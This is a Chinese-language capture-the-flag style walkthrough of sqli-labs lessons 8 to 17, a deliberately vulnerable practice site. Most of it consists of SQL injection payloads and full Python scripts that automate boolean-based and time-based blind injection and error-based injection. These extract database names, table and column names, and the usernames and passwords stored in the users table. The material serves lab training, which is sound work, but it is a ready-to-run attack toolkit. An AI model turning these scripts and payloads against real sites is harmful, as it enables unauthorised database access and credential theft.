sqli.labs靶场(8-17关)

8、第八关(布尔盲注)

id=1显示You are in...........,id=1'单引号不显示,id=1' --+显示正常

这个应该是单引号闭合,接下来就和第七关差不多上脚本

爆库名长度:id=1%27%20and%20length(database())={i}%20--+

爆库名:id=1%27%20and%20substr(database(),{p},1)=%22{a}%22%20--+

爆表名:id=1%27%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\"%20--+

爆users表字段名:id=1%27%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),{p},1)=\"{a}\"%20--+

爆users表账号密码:id=1%27%20and%20substr((select group_concat(username,':',password) from users),{p},1)=\"{a}\"%20--+

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-8/?id=1%27%20"
    list1 = numbers + letters2 + fuhao
    len1 = 20
    # 获取数据库名长度
    db_length = 0
    for i in range(50):
        url_db = url + f"and%20length(database())={i}%20--+"
        res = requests.get(url_db)
        if "You are in..." in res.text:
            db_length = i
            break
    print(f"数据库名长度:{db_length}")
    # 获取数据库名
    database = ""
    print(f"数据库:")
    for p in range(db_length + 1):
        for a in list1:
            url_db = url + f"and%20substr(database(),{p},1)=%22{a}%22%20--+"
            res = requests.get(url_db)
            if "You are in..." in res.text:
                database = f"{database}{a}"
                print(a, end='')
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1)*2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\"%20--+"
            res = requests.get(url_db)
            num += 1
            if "You are in..." in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1)*2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\"%20--+"
            res = requests.get(url_db)
            num += 1
            if "You are in..." in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1)*2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=\"{a}\"%20--+"
            res = requests.get(url_db)
            num += 1
            if "You are in..." in res.text:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

9、第九关(时间盲注)

根据提示是单引号时间盲注

尝试id=1' union select 1,2,sleep(1)%20 --+后页面加载超过1秒,但没有任何变化

确定时间盲注后,脚本爆库

爆数据库:id=1' and%20if(substr(database(),{p},1)=%27{a}%27,sleep(5),0) --+

爆表名:id=1' and%20if(substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+

爆users表字段名:id=1%27%20and%20if(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+

爆users表账号密码:id=1%27%20and%20if(substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27,sleep(5),0)%20--+

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-9/?id=1%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20if(substr(database(),{p},1)=%27{a}%27,sleep(5),0) --+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20if(substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20if(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20if(substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27,sleep(5),0)%20--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

10、第十关

这关和第九关一样,只是单引号闭合变成了双引号闭合

id=1" and if(1=1,sleep(1),0) --+

爆数据库:id=1" and%20if(substr(database(),{p},1)=%27{a}%27,sleep(5),0) --+

爆表名:id=1" and%20if(substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+

爆users表字段名:id=1%22%20and%20if(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+

爆users表账号密码:id=1%22%20and%20if(substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27,sleep(5),0)%20--+

11、第十一关(报错注入)

这个是post单引号闭合,直接用报错注入即可

直接爆库uname=admin' and extractvalue(1,concat(0x7e,database(),0x7e))--+&passwd=admin&submit=Submit

uname=admin' and false union select 1,2 --+&passwd=admin&submit=Submit爆出查询位置

爆出所有表uname=admin' and false union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' --+&passwd=admin&submit=Submit

爆出users表字段admin' and false union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' --+

爆出所有账号密码admin' and false union select 1,group_concat(username,':',password) from users--+

12、第十二关uname=admin"&passwd=admin&submit=Submit双引号报错,应该是双引号闭合

admin" --+也报错,admin") --+正常,应该是双引号加括号闭合

接下来步骤和十一关差不多

爆库:uname=admin") and false union select 1,database() --+

爆表:uname=admin") and false union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' --+

爆字段:uname=admin") and false union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

爆账号密码:uname=admin") and false union select 1,group_concat(username,':',password) from users --+

13、第十三关(布尔盲注,报错注入)

admin:admin显示登陆成功

admin111:admin显示登录失败

uname=admin111' --+报错

uname=admin111') --+没报错,应该是单引号加括号闭合

这个算是POST布尔盲注,也可报错注入,直接盲注上脚本

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-13/"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin') and substr(database(),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.text) == 1493:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin') and substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1493:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin') and substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1493:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin') and substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1493:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

14、第十四关(布尔盲注,报错注入)

uname=admin"&passwd=admin&submit=Submit,双引号报错,有报错显示,可用报错注入

uname=admin" --+&passwd=admin&submit=Submit正常显示,说明双引号闭合,而且有登陆成功和失败两种状态,可用布尔盲注,正确返回内容长度1494

接下来上脚本,和上面关卡类似

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-14/"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\" and substr(database(),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.text) == 1494:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\" and substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1494:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\" and substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1494:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\" and substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1494:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

15、第十五关(布尔盲注)

uname=admin&passwd=admin&submit=Submit显示登陆成功

uname=admin'&passwd=admin&submit=Submit显示登陆失败uname=admin' --+&passwd=admin&submit=Submit也成功,那就应该是单引号闭合,可以POST布尔盲注

正确返回内容长度1492,接下来上脚本

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-15/"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin' and substr(database(),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.text) == 1492:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin' and substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1492:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin' and substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1492:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin' and substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1492:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

16、第十六关

经过多次尝试,uname=admin")--+&passwd=admin&submit=Submit登陆成功,应该是双引号加括号闭合

登陆成功的内容长度是1504,还是跑脚本

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-16/"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\") and substr(database(),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.text) == 1504:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\") and substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1504:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\") and substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1504:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"uname": f"admin\") and substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "submit": "Submit"})
            if len(res.content) == 1504:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

17、第十七关

这个是重置密码的,经测试password参数是单引号闭合

爆库:uname=admin&passwd=admin1' and (extractvalue(1,concat(0x7e,database(),0x7e)))#&submit=Submit

爆表:uname=admin&passwd=111' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)))#&submit=Submit

爆字段:uname=admin&passwd=111' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e)))#&submit=Submit

爆账号密码:uname=admin&passwd=1' and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c))) or '&submit=Submit

这个好像报不出来,显示不让查users表

相关推荐
dazhong20125 分钟前
PLSQL 客户端连接 Oracle 数据库配置
数据库·oracle
苹果醋32 小时前
React源码02 - 基础知识 React API 一览
java·运维·spring boot·mysql·nginx
了一li2 小时前
Qt中的QProcess与Boost.Interprocess:实现多进程编程
服务器·数据库·qt
码农君莫笑3 小时前
信管通低代码信息管理系统应用平台
linux·数据库·windows·低代码·c#·.net·visual studio
别致的影分身3 小时前
使用C语言连接MySQL
数据库·mysql
过过过呀Glik3 小时前
在 Ubuntu 上安装 MySQL 的详细指南
mysql·ubuntu
京东零售技术5 小时前
“慢”增长时代的企业数据体系建设:超越数据中台
数据库
sdaxue.com5 小时前
帝国CMS:如何去掉帝国CMS登录界面的认证码登录
数据库·github·网站·帝国cms·认证码
o(╥﹏╥)6 小时前
linux(ubuntu )卡死怎么强制重启
linux·数据库·ubuntu·系统安全
阿里嘎多学长6 小时前
docker怎么部署高斯数据库
运维·数据库·docker·容器